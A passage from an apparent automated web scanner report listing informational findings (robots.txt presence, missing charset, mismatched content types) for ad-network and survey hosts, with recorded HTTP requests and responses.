Last-Modified: Thu, 07 Jul 2011 18:29:25 GMT
Content-Length: 28
Content-Type: text/plain
Expires: Sun, 18 Sep 2011 12:41:15 GMT
Date: Sat, 17 Sep 2011 12:41:15 GMT
Connection: close
Cache-Control: private, no-transform, max-age=86400

User-agent: *
Disallow: /

20.4. http://bidder.mathtag.com/notify  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bidder.mathtag.com
Path:   /notify

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: bidder.mathtag.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 13:29:12 GMT
Server: MMBD/3.5.15.3
Content-Type: text/plain
Content-Length: 25
x-mm-host: pao-bidder-x7
Connection: close

User-agent: *
Disallow: /

20.5. http://blekko.com/autocomplete  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blekko.com
Path:   /autocomplete

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: blekko.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 17 Sep 2011 14:51:22 GMT
Content-Type: text/plain
Content-Length: 1601
Last-Modified: Thu, 08 Sep 2011 17:43:30 GMT
Connection: close
Vary: Accept-Encoding
Expires: Sun, 18 Sep 2011 14:51:22 GMT
Cache-Control: max-age=86400
Accept-Ranges: bytes

User-agent: *
Allow: /ws/+/contact
Allow: /ws/+/about
Allow: /ws/+/privacy
Allow: /ws/+/terms
Allow: /ws/+/toolbar
Allow: /ws/+/blekkojobs
Allow: /ws/+/webmaster
Allow: /ws/+/features
Allow: /ws/+/hel
...[SNIP]...

20.6. http://cdn.slidesharecdn.com/profile-photo-MillwardBrown-48x48  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.slidesharecdn.com
Path:   /profile-photo-MillwardBrown-48x48

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cdn.slidesharecdn.com

Response

HTTP/1.0 200 OK
x-amz-id-2: fu44qWQCzhWof3A+JD48vSg5UyNFTP530t5LnkVMGfP8kw5ZniYipw6DEuQruTMm
x-amz-request-id: D79E8F20142D8D07
Last-Modified: Mon, 02 Feb 2009 08:07:57 GMT
ETag: "9152d7f1724ed8fbcd2e0c87029f193c"
Accept-Ranges: bytes
Content-Type: text/plain
Content-Length: 25
Server: AmazonS3
Date: Sat, 17 Sep 2011 14:45:45 GMT
Connection: close

User-agent: *
Disallow: /

20.7. http://en.wikipedia.org/wiki/Chromium  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://en.wikipedia.org
Path:   /wiki/Chromium

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: en.wikipedia.org

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 12:40:59 GMT
Server: Apache
Cache-Control: s-maxage=3600, must-revalidate, max-age=0
X-Article-ID: 19292575
X-Language: en
X-Site: wikipedia
Last-Modified: Thu, 30 Jun 2011 23:13:05 GMT
Vary: Accept-Encoding
Content-Length: 27355
Content-Type: text/plain; charset=utf-8
X-Cache: HIT from sq66.wikimedia.org
X-Cache-Lookup: HIT from sq66.wikimedia.org:3128
Age: 232
X-Cache: HIT from sq71.wikimedia.org
X-Cache-Lookup: HIT from sq71.wikimedia.org:80
Connection: close

#
# robots.txt for http://www.wikipedia.org/ and friends
#
# Please note: There are a lot of pages on this site, and there are
# some misbehaved spiders out there that go _way_ too fast. If you're
# i
...[SNIP]...

20.8. http://pixel.33across.com/ps/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.33across.com
Path:   /ps/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.33across.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:44:03 GMT
Server: Apache
Last-Modified: Thu, 21 Jul 2011 21:37:22 GMT
Accept-Ranges: bytes
Content-Length: 27
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Disallow: /


20.9. http://s.dlqm.net/asdet/read_dlqm_v2.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s.dlqm.net
Path:   /asdet/read_dlqm_v2.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s.dlqm.net

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:33:53 GMT
Server: Apache
Last-Modified: Mon, 12 Jan 2009 22:27:11 GMT
ETag: "65fa34-1a-460509b9a0b87"
Accept-Ranges: bytes
Content-Length: 26
Vary: Accept-Encoding
Keep-Alive: timeout=120, max=389
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_iuuq-t.emrn.ofu=445836713660;Version=1;Max-Age=1200;path=/

User-agent: *
Disallow: /

20.10. http://s1.2mdn.net/2992003/09-1213%20Yellow%20Gecko%20728x90.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s1.2mdn.net
Path:   /2992003/09-1213%20Yellow%20Gecko%20728x90.swf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s1.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sat, 17 Sep 2011 13:29:26 GMT
Expires: Sun, 18 Sep 2011 13:29:26 GMT
Cache-Control: public, max-age=86400
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 28
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /

20.11. http://segment-pixel.invitemedia.com/set_partner_uid  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /set_partner_uid

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: segment-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sat, 17 Sep 2011 14:44:03 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /

20.12. http://survey.questionmarket.com/surv/913131/ai_start.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://survey.questionmarket.com
Path:   /surv/913131/ai_start.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: survey.questionmarket.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:37:49 GMT
Server: Apache
Last-Modified: Mon, 12 Jan 2009 22:27:11 GMT
ETag: "65fa34-1a-460509b9a0b87"
Accept-Ranges: bytes
Content-Length: 26
Vary: Accept-Encoding
Keep-Alive: timeout=120, max=732
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_tvswfz-iuuq=4458360f3660;Version=1;Max-Age=1200;path=/

User-agent: *
Disallow: /

20.13. http://www.slideshare.net/MillwardBrown/value-of-a-fan  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.slideshare.net
Path:   /MillwardBrown/value-of-a-fan

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.slideshare.net

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Content-Type: text/plain; charset=utf-8
Last-Modified: Fri, 16 Sep 2011 21:56:56 GMT
Content-Length: 301
Date: Sat, 17 Sep 2011 14:45:35 GMT
X-Varnish: 715112622
Age: 0
Via: 1.1 varnish
Connection: close

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt fil
#User-agent: Slurp
#Crawl-delay: 5

Sitemap: http://www.slideshare.net/sitemap.xml
User-agent: *
Disa
...[SNIP]...

21. HTML does not specify charset  previous  next
There are 7 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


21.1. http://amch.questionmarket.com/adscgen/d_layer.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/d_layer.php

Request

GET /adscgen/d_layer.php?sub=amch&type=d_layer&survey_num=913131&site=10&code=922738&p=1&protocol=http&lang=&auto_ctl_invite=0&noiframe=1&loc=aHR0cDovL3d3dy5kZWxpc2guY29tL3NlYXJjaC9mYXN0X3NlYXJjaF9yZWNpcGVzP3NlYXJjaF90ZXJtPXhzcytzdWdhcitjYWtlJg== HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.delish.com/search/fast_search_recipes?search_term=xss+sugar+cake&
Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1; LP=1316270041

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:37:42 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b203.dl
Content-Type: text/html
Content-Length: 13907

var DL_HideSelects = true;
var DL_HideObjects = false;
var DL_HideIframes = false;
var DL_Banner; // Will be bound to the DIV element representing the layer
var DL_ScrollState = 0;
var DL_width;
var D
...[SNIP]...

21.2. http://amch.questionmarket.com/adscgen/dynamiclink.js.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/dynamiclink.js.php

Request

GET /adscgen/dynamiclink.js.php?sub=amch&type=d_layer&survey_num=913131&site=10&code=922738&p=1&protocol=http&lang=&auto_ctl_invite=0&noiframe=1&loc=aHR0cDovL3d3dy5kZWxpc2guY29tL3NlYXJjaC9mYXN0X3NlYXJjaF9yZWNpcGVzP3NlYXJjaF90ZXJtPXhzcytzdWdhcitjYWtlJg== HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.delish.com/search/fast_search_recipes?search_term=xss+sugar+cake&
Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:37:40 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b203.dl
Set-Cookie: LP=1316270260; expires=Wed, 21 Sep 2011 18:37:40 GMT; path=/; domain=.questionmarket.com
Content-Length: 875
Content-Type: text/html

if (!window.DL_already_ran) (function(){
var d,e,h=false,s="http://amch.questionmarket.com/adscgen/d_layer.php?sub=amch&type=d_layer&survey_num=913131&site=10&code=922738&p=1&protocol=http&lang=&auto_
...[SNIP]...

21.3. http://amch.questionmarket.com/adscgen/endsurvey_disq.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/endsurvey_disq.php

Request

GET /adscgen/endsurvey_disq.php HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://survey.questionmarket.com/surv/925590/newai.php?ai_id=326080549&site=5&from_aicode=922738&continue_to=&yob=12&age=99&country=38&dq_history=913131,10&tmplt=
Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1; LP=1316270054; veranda_sess=survey_num%3D913131%2Cmember_id%3D326080549%2Cfrom_site%3D10%2Cfrom_aicode%3D922738%2Ctime%3D1316270056; ST=913131_

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:42:02 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Content-Length: 221
Content-Type: text/html

<script language=javascript>
var i=new Image();i.src="http://survey.questionmarket.com/veranda/cpd_survey.php?disq=1";try{
document.domain = 'questionmarket.com';
parent.js_control.endSurvey();
} catc
...[SNIP]...

21.4. http://amch.questionmarket.com/adscgen/st.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/st.php

Request

GET /adscgen/st.php?survey_num=924563&site=68852647&code=43741105&randnum=6212411 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 13:02:39 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
DL_S: b102.dl
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Content-Length: 164
Content-Type: text/html

(function(){
if(1!=4){
(new Image).src="http://amch.questionmarket.com/adsc/d924563/3/43741105/decide.php?ord="+Math.floor((new Date()).getTime()/1000);


}
})();


21.5. http://amch.questionmarket.com/adscgen/sta.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/sta.php

Request

GET /adscgen/sta.php?survey_num=913132&site=16161131484279092&code=8029877&ut_sys=mplx HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://img.mediaplex.com/content/0/16161/131484/CBD_P3Student_Product_Like_728x90_V1R1.html?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F16161-131484-27909-2%3Fmpt%3D%5B555223779ER%5D&mpjs=amch.questionmarket.com%2Fadscgen%2Fsta.php%3Fsurvey_num%3D913132%26site%3D16161131484279092%26code%3D8029877%26ut_sys%3Dmplx%20cdn.doubleverify.com%2Fscript312.js%3Fagnc%3D936622%26cmp%3D1057913%26crt%3D%26crtname%3D%26adnet%3D%26dvtagver%3D3.3.1346.2176%26adsrv%3D8%26plc%3D16161131484279092%26advid%3D421303%26sid%3D16161131484279092%26adid%3D%20img-cdn.mediaplex.com%2F0%2F16161%2FNielsen_pixel.js%3Fcampid%3D133016%26crid%3D8029877%26plid%3D16161131484279092&mpt=[555223779ER]&mpvc=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_924563-#^>|M-0

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 13:05:09 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
DL_S: b202.dl
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Content-Length: 168
Content-Type: text/html

(function(){
if(1!=4){
(new Image).src="http://amch.questionmarket.com/adsc/d913132/5/400008029877/decide.php?ord="+Math.floor((new Date()).getTime()/1000);


}
})();


21.6. http://amch.questionmarket.com/adscgen/surv_lastpage_disq.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/surv_lastpage_disq.php

Request

GET /adscgen/surv_lastpage_disq.php?p1=Click+to+Close&p2=Continue+to+your+destination HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://survey.questionmarket.com/surv/925590/newai.php?ai_id=326080549&site=5&from_aicode=922738&continue_to=&yob=12&age=99&country=38&dq_history=913131,10&tmplt=
Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1; LP=1316270054; veranda_sess=survey_num%3D913131%2Cmember_id%3D326080549%2Cfrom_site%3D10%2Cfrom_aicode%3D922738%2Ctime%3D1316270056; ST=913131_

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:41:40 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Set-Cookie: veranda_ses=deleted; expires=Fri, 17 Sep 2010 14:41:39 GMT; path=/; domain=.questionmarket.com
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Content-Length: 354
Content-Type: text/html

(function(){
if (self==top) {
   if (window.opener)
       document.write('<a href="javascript:window.close()">Click to Close</a>');
} else {
       document.write('<a href="http://amch.questionmarket.com/adscgen
...[SNIP]...

21.7. http://webmedia.oreck.com/cookE/geoip/iframe  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://webmedia.oreck.com
Path:   /cookE/geoip/iframe

Request

GET /cookE/geoip/iframe?spacedesc=2112034_1113699_180x150_2037848_2112034&target=_blank&@CPSC@=http://clk.atdmt.com/go/msnnkdrv0010001658apm/direct;wi.180;hi.150;01;ai.234564869.234602079;ct.1/01?href= HTTP/1.1
Host: webmedia.oreck.com
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=CP49AO&cb=404881879
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 13:06:31 GMT
Server: Apache
Cache-Control: no-cache, must-revalidate
Expires: Tue, 1 Jan 1970 01:01:01 GMT
Pragma: no-cache
P3P: policyref="http://webmedia.oreck.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Set-Cookie: PrefID=11-676885560; expires=Tue, 17 Sep 2013 01:06:31 GMT; path=/; domain=.oreck.com
Set-Cookie: CSList=1088660/1113699,1088660/1113699,0/0,0/0,0/0; expires=Fri, 16 Dec 2011 13:06:31 GMT; path=/; domain=.oreck.com
x_transtrans: 14.6.10.688
Content-Type: text/html
Content-Length: 5290
Connection: close


<SCRIPT LANGUAGE="JavaScript">

function Measure_this(EV)
{
var img = new Image();
img.src = "http://webmedia.oreck.com/image_htmlping?spacedesc=2112034_1113699_180x150_2037848_2112034&af=1119611
...[SNIP]...

22. Content type incorrectly stated  previous
There are 9 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


22.1. http://adserver.teracent.net/tase/ad  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://adserver.teracent.net
Path:   /tase/ad

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /tase/ad?AdBoxType=16&url=nissan.dfa&inv=doubleclick&rnd=1316283170160&esc=0&CustomQuery=dcp%3Domd%26oem%3Dnissan%26eaid%3D242388130%26epid%3D61484958%26esid%3D598068%26ecid%3D43899957%26campId%3D5290464%26model%3DAS%26 HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=N9CZDAH.Q7IPoP; act=a$305#1315313311294_68374606_as3101_clk!1315313297486_68372787_as3103_imp!|; imp=a$le#1316221548509_135234331_as3100_vew|374#1316221548433_135109402_as3106_imp|305#1315313297486_68372787_as3103_imp|; p161r=b$u-32#A.8Gx|g-yWB#1.8Gx|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1316265127233_137611811_as3107_imp|308#1316265127233_137611811_as3107_imp|374#1316221548433_135109402_as3106_imp|305#1315313297486_68372787_as3103_imp|; Domain=.teracent.net; Expires=Thu, 15-Mar-2012 13:12:07 GMT; Path=/tase
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 13:12:06 GMT
Content-Length: 3406

resourceServer=http%3A%2F%2Fpcdn.tcgmsrv.net%2Ftase&eventId=1316265127233_137611811_as3107_imp&responseStatus=0&eventUrl=http%3A%2F%2Fadserver.teracent.net%2Ftase%2Fredir%2F1316265127233_137611811_as3
...[SNIP]...

22.2. http://amch.questionmarket.com/adscgen/d_layer.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://amch.questionmarket.com
Path:   /adscgen/d_layer.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /adscgen/d_layer.php?sub=amch&type=d_layer&survey_num=913131&site=10&code=922738&p=1&protocol=http&lang=&auto_ctl_invite=0&noiframe=1&loc=aHR0cDovL3d3dy5kZWxpc2guY29tL3NlYXJjaC9mYXN0X3NlYXJjaF9yZWNpcGVzP3NlYXJjaF90ZXJtPXhzcytzdWdhcitjYWtlJg== HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.delish.com/search/fast_search_recipes?search_term=xss+sugar+cake&
Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1; LP=1316270041

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:37:42 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b203.dl
Content-Type: text/html
Content-Length: 13907

var DL_HideSelects = true;
var DL_HideObjects = false;
var DL_HideIframes = false;
var DL_Banner; // Will be bound to the DIV element representing the layer
var DL_ScrollState = 0;
var DL_width;
var D
...[SNIP]...

22.3. http://amch.questionmarket.com/adscgen/dynamiclink.js.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://amch.questionmarket.com
Path:   /adscgen/dynamiclink.js.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /adscgen/dynamiclink.js.php?sub=amch&type=d_layer&survey_num=913131&site=10&code=922738&p=1&protocol=http&lang=&auto_ctl_invite=0&noiframe=1&loc=aHR0cDovL3d3dy5kZWxpc2guY29tL3NlYXJjaC9mYXN0X3NlYXJjaF9yZWNpcGVzP3NlYXJjaF90ZXJtPXhzcytzdWdhcitjYWtlJg== HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.delish.com/search/fast_search_recipes?search_term=xss+sugar+cake&
Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:37:40 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b203.dl
Set-Cookie: LP=1316270260; expires=Wed, 21 Sep 2011 18:37:40 GMT; path=/; domain=.questionmarket.com
Content-Length: 875
Content-Type: text/html

if (!window.DL_already_ran) (function(){
var d,e,h=false,s="http://amch.questionmarket.com/adscgen/d_layer.php?sub=amch&type=d_layer&survey_num=913131&site=10&code=922738&p=1&protocol=http&lang=&auto_
...[SNIP]...

22.4. http://amch.questionmarket.com/adscgen/st.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://amch.questionmarket.com
Path:   /adscgen/st.php

Issue detail

